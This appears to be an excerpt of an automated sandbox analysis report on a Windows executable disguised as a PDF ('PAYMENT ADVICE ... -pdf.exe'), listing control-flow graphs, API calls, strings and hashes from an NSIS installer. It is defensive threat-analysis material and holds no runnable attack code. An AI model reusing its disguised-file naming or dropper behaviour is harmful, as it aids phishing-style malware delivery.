ExitProcess 77->80 87 4035a3-4035a7 78->87 88 40359c-4035a1 78->88 79->80 81->48 97 4035c7-4035dd call 406055 * 2 81->97 98 403634-40363a lstrcatW 82->98 99 40363f-403659 lstrcatW lstrcmpiW 82->99 84->85 95 403798-4037a3 ExitWindowsEx 85->95 96 40378c-403796 85->96 87->78 92 4035a9 87->92 88->87 88->92 92->73 95->77 101 4037a5-4037a7 call 40140b 95->101 96->95 96->101 97->56 98->99 99->48 100 40365b-40365e 99->100 104 403660-403665 call 405683 100->104 105 403667 call 405700 100->105 101->77 113 40366c-40367a SetCurrentDirectoryW 104->113 105->113 114 403687-4036b0 call 406055 113->114 115 40367c-403682 call 406055 113->115 119 4036b5-4036d1 call 406077 DeleteFileW 114->119 115->114 122 403712-40371a 119->122 123 4036d3-4036e3 CopyFileW 119->123 122->119 125 40371c-403723 call 405ef6 122->125 123->122 124 4036e5-403705 call 405ef6 call 406077 call 405735 123->124 124->122 134 403707-40370e CloseHandle 124->134 125->48 134->122
                                                                                                                APIs
                                                                                                                • SetErrorMode.KERNELBASE ref: 004032C2
                                                                                                                • GetVersion.KERNEL32 ref: 004032C8
                                                                                                                • #17.COMCTL32(00000007,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00403318
                                                                                                                • OleInitialize.OLE32(00000000), ref: 0040331F
                                                                                                                • SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 0040333B
                                                                                                                • GetCommandLineW.KERNEL32(00433F00,NSIS Error), ref: 00403350
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000000), ref: 00403363
                                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000020), ref: 0040338A
                                                                                                                  • Part of subcall function 0040642B: GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                  • Part of subcall function 0040642B: GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C5
                                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D6
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034E2
                                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F6
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FE
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350F
                                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403517
                                                                                                                • DeleteFileW.KERNELBASE(1033), ref: 0040352B
                                                                                                                  • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000000,?), ref: 0040362B
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000000,?), ref: 0040363A
                                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000000,?), ref: 00403645
                                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe",00000000,?), ref: 00403651
                                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040366D
                                                                                                                • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe,0042AA28,00000001), ref: 004036DB
                                                                                                                • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                • API String ID: 3586999533-3641196071
                                                                                                                • Opcode ID: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                • Opcode Fuzzy Hash: 3682aa0965639021e03f4566d3ad19ba72e47f3fbc4049e085dd8c08cc589649
                                                                                                                • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 135 404b30-404b7c GetDlgItem * 2 136 404b82-404c16 GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 135->136 137 404d9d-404da4 135->137 138 404c25-404c2c DeleteObject 136->138 139 404c18-404c23 SendMessageW 136->139 140 404da6-404db6 137->140 141 404db8 137->141 143 404c2e-404c36 138->143 139->138 142 404dbb-404dc4 140->142 141->142 144 404dc6-404dc9 142->144 145 404dcf-404dd5 142->145 146 404c38-404c3b 143->146 147 404c5f-404c63 143->147 144->145 149 404eb3-404eba 144->149 152 404de4-404deb 145->152 153 404dd7-404dde 145->153 150 404c40-404c5d call 406077 SendMessageW * 2 146->150 151 404c3d 146->151 147->143 148 404c65-404c91 call 404119 * 2 147->148 191 404c97-404c9d 148->191 192 404d5c-404d6f GetWindowLongW SetWindowLongW 148->192 155 404f2b-404f33 149->155 156 404ebc-404ec2 149->156 150->147 151->150 158 404e60-404e63 152->158 159 404ded-404df0 152->159 153->149 153->152 164 404f35-404f3b SendMessageW 155->164 165 404f3d-404f44 155->165 161 405113-405125 call 404180 156->161 162 404ec8-404ed2 156->162 158->149 163 404e65-404e6f 158->163 167 404df2-404df9 159->167 168 404dfb-404e10 call 404a7e 159->168 162->161 173 404ed8-404ee7 SendMessageW 162->173 175 404e71-404e7d SendMessageW 163->175 176 404e7f-404e89 163->176 164->165 169 404f46-404f4d 165->169 170 404f78-404f7f 165->170 167->158 167->168 168->158 190 404e12-404e23 168->190 178 404f56-404f5d 169->178 179 404f4f-404f50 ImageList_Destroy 169->179 182 4050d5-4050dc 170->182 183 404f85-404f91 call 4011ef 170->183 173->161 184 404eed-404efe SendMessageW 173->184 175->176 176->149 177 404e8b-404e95 176->177 186 404ea6-404eb0 177->186 187 404e97-404ea4 177->187 188 404f66-404f72 178->188 189 404f5f-404f60 GlobalFree 178->189 179->178 182->161 196 4050de-4050e5 182->196 209 404fa1-404fa4 183->209 210 404f93-404f96 183->210 194 404f00-404f06 184->194 195 404f08-404f0a 184->195 186->149 187->149 188->170 189->188 190->158 197 404e25-404e27 190->197 198 404ca0-404ca7 191->198 202 404d75-404d79 192->202 194->195 200 404f0b-404f24 call 401299 SendMessageW 194->200 195->200 196->161 201 4050e7-405111 ShowWindow GetDlgItem ShowWindow 196->201 205 404e29-404e30 197->205 206 404e3a 197->206 207 404d3d-404d50 198->207 208 404cad-404cd5 198->208 200->155 201->161 203 404d93-404d9b call 40414e 202->203 204 404d7b-404d8e ShowWindow call 40414e 202->204 203->137 204->161 214 404e32-404e34 205->214 215 404e36-404e38 205->215 218 404e3d-404e59 call 40117d 206->218 207->198 222 404d56-404d5a 207->222 216 404cd7-404d0d SendMessageW 208->216 217 404d0f-404d11 208->217 223 404fe5-405009 call 4011ef 209->223 224 404fa6-404fbf call 4012e2 call 401299 209->224 219 404f98 210->219 220 404f99-404f9c call 404afe 210->220 214->218 215->218 216->207 228 404d13-404d22 SendMessageW 217->228 229 404d24-404d3a SendMessageW 217->229 218->158 219->220 220->209 222->192 222->202 237 4050ab-4050bf InvalidateRect 223->237 238 40500f 223->238 242 404fc1-404fc7 224->242 243 404fcf-404fde SendMessageW 224->243 228->207 229->207 237->182 240 4050c1-4050d0 call 404a51 call 404a39 237->240 241 405012-40501d 238->241 240->182 244 405093-4050a5 241->244 245 40501f-40502e 241->245 247 404fc9 242->247 248 404fca-404fcd 242->248 243->223 244->237 244->241 250 405030-40503d 245->250 251 405041-405044 245->251 247->248 248->242 248->243 250->251 252 405046-405049 251->252 253 40504b-405054 251->253 255 405059-405091 SendMessageW * 2 252->255 253->255 256 405056 253->256 255->244 256->255
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                • String ID: $M$N
                                                                                                                • API String ID: 1638840714-813528018
                                                                                                                • Opcode ID: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                • Opcode Fuzzy Hash: 37c0d117f69d9981bf9ee6a996e8bb1311bbffd6fee652051518e89c5349b062
                                                                                                                • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 500 406077-406082 501 406084-406093 500->501 502 406095-4060ab 500->502 501->502 503 4060b1-4060be 502->503 504 4062c3-4062c9 502->504 503->504 507 4060c4-4060cb 503->507 505 4060d0-4060dd 504->505 506 4062cf-4062da 504->506 505->506 510 4060e3-4060ef 505->510 508 4062e5-4062e6 506->508 509 4062dc-4062e0 call 406055 506->509 507->504 509->508 512 4062b0 510->512 513 4060f5-406131 510->513 514 4062b2-4062bc 512->514 515 4062be-4062c1 512->515 516 406251-406255 513->516 517 406137-406142 GetVersion 513->517 514->504 515->504 518 406257-40625b 516->518 519 40628a-40628e 516->519 520 406144-406148 517->520 521 40615c 517->521 522 40626b-406278 call 406055 518->522 523 40625d-406269 call 405f9c 518->523 525 406290-406298 call 406077 519->525 526 40629d-4062ae lstrlenW 519->526 520->521 527 40614a-40614e 520->527 524 406163-40616a 521->524 538 40627d-406286 522->538 523->538 530 40616c-40616e 524->530 531 40616f-406171 524->531 525->526 526->504 527->521 528 406150-406154 527->528 528->521 534 406156-40615a 528->534 530->531 536 406173-406199 call 405f22 531->536 537 4061ad-4061b0 531->537 534->524 548 406238-40623c 536->548 549 40619f-4061a8 call 406077 536->549 541 4061c0-4061c3 537->541 542 4061b2-4061be GetSystemDirectoryW 537->542 538->526 540 406288 538->540 544 406249-40624f call 4062e9 540->544 546 4061c5-4061d3 GetWindowsDirectoryW 541->546 547 40622e-406230 541->547 545 406232-406236 542->545 544->526 545->544 545->548 546->547 547->545 550 4061d5-4061df 547->550 548->544 555 40623e-406244 lstrcatW 548->555 549->545 552 4061e1-4061e4 550->552 553 4061f9-40620f SHGetSpecialFolderLocation 550->553 552->553 557 4061e6-4061ed 552->557 558 406211-406228 SHGetPathFromIDListW CoTaskMemFree 553->558 559 40622a 553->559 555->544 561 4061f5-4061f7 557->561 558->545 558->559 559->547 561->545 561->553
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040613A
                                                                                                                • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004061B8
                                                                                                                • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 004061CB
                                                                                                                • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00406207
                                                                                                                • SHGetPathFromIDListW.SHELL32(?,Call), ref: 00406215
                                                                                                                • CoTaskMemFree.OLE32(?), ref: 00406220
                                                                                                                • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406244
                                                                                                                • lstrlenW.KERNEL32(Call,00000000,0042C248,?,004051EB,0042C248,00000000,00000000,0041D820), ref: 0040629E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                • API String ID: 900638850-1230650788
                                                                                                                • Opcode ID: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                • Instruction ID: e2b9bd4c7d0941b93a588dc58e8d14d5200dcae9cd5da35c43f1ba43b89dddbc
                                                                                                                • Opcode Fuzzy Hash: 815d4a1d12106e293d3587ab000579fb05f8572ec1ae3e21e1ffc4f2e4f9e7d3
                                                                                                                • Instruction Fuzzy Hash: 79610371A00504EBDF20AF64CC40BAE37A5AF55324F16817FE942BA2D0D73D9AA1CB4D

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 562 405846-40586c call 405b11 565 405885-40588c 562->565 566 40586e-405880 DeleteFileW 562->566 568 40588e-405890 565->568 569 40589f-4058af call 406055 565->569 567 405a02-405a06 566->567 570 4059b0-4059b5 568->570 571 405896-405899 568->571 577 4058b1-4058bc lstrcatW 569->577 578 4058be-4058bf call 405a55 569->578 570->567 574 4059b7-4059ba 570->574 571->569 571->570 575 4059c4-4059cc call 406398 574->575 576 4059bc-4059c2 574->576 575->567 586 4059ce-4059e2 call 405a09 call 4057fe 575->586 576->567 580 4058c4-4058c8 577->580 578->580 582 4058d4-4058da lstrcatW 580->582 583 4058ca-4058d2 580->583 585 4058df-4058fb lstrlenW FindFirstFileW 582->585 583->582 583->585 587 405901-405909 585->587 588 4059a5-4059a9 585->588 602 4059e4-4059e7 586->602 603 4059fa-4059fd call 4051b4 586->603 590 405929-40593d call 406055 587->590 591 40590b-405913 587->591 588->570 593 4059ab 588->593 604 405954-40595f call 4057fe 590->604 605 40593f-405947 590->605 594 405915-40591d 591->594 595 405988-405998 FindNextFileW 591->595 593->570 594->590 598 40591f-405927 594->598 595->587 601 40599e-40599f FindClose 595->601 598->590 598->595 601->588 602->576 607 4059e9-4059f8 call 4051b4 call 405ef6 602->607 603->567 613 405980-405983 call 4051b4 604->613 614 405961-405964 604->614 605->595 608 405949-405952 call 405846 605->608 607->567 608->595 613->595 617 405966-405976 call 4051b4 call 405ef6 614->617 618 405978-40597e 614->618 617->595 618->595
                                                                                                                APIs
                                                                                                                • DeleteFileW.KERNELBASE(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 0040586F
                                                                                                                • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 004058B7
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 004058DA
                                                                                                                • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 004058E0
                                                                                                                • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"), ref: 004058F0
                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                Strings
                                                                                                                • "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe", xrefs: 0040584F
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405853
                                                                                                                • \*.*, xrefs: 004058B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                • String ID: "C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                • API String ID: 2035342205-3518799233
                                                                                                                • Opcode ID: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                • Opcode Fuzzy Hash: 93e21722a180473d247efaee9d9481d6b8afddc4eaefe0f7bae919d4fb0dd793
                                                                                                                • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(004085A8,?,00000001,00408598,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor, xrefs: 00402154
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072634866.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072679131.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2072819686.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInstance
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Beclamor
                                                                                                                • API String ID: 542301482-1825927138
                                                                                                                • Opcode ID: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                • Instruction ID: 1a24425b30559046e2e45c95ea19553466384e890d2313978d3609d0df4c75fa
                                                                                                                • Opcode Fuzzy Hash: 146cf55ee0b1f2e236d84f42d428f2d21f191b8343958f8e7f458ea2ed3a719d
                                                                                                                • Instruction Fuzzy Hash: 3E412C71A00208AFCF00DFA4CD88AAD7BB5FF48314B24457AF515EB2D1DBB99A41CB54
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNELBASE(74DF3420,004302B8,0042FA70,00405B5A,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 004063A3
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004063AF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2072616299.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2072561780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
